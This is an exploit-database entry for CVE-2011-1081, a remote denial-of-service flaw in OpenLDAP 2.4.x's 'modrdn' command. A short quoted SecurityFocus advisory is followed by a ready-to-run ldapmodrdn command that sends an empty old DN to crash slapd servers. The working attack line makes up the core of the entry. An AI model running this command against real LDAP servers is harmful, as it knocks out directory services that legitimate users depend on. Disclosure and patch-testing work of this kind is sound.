OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service



EKU-ID: 40068 CVE: CVE-2011-1081;OSVDB-72530 OSVDB-ID:
Author: Serge Dubrouski Published: 2011-01-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/46831/info

OpenLDAP is prone to a remote denial-of-service vulnerability that affects the 'modify relative distinguished name' (modrdn) command.

Attackers can exploit this issue to deny service to legitimate users by crashing affected 'slapd' servers.

ldapmodrdn -x -H ldap://ldapserver -r '' o=test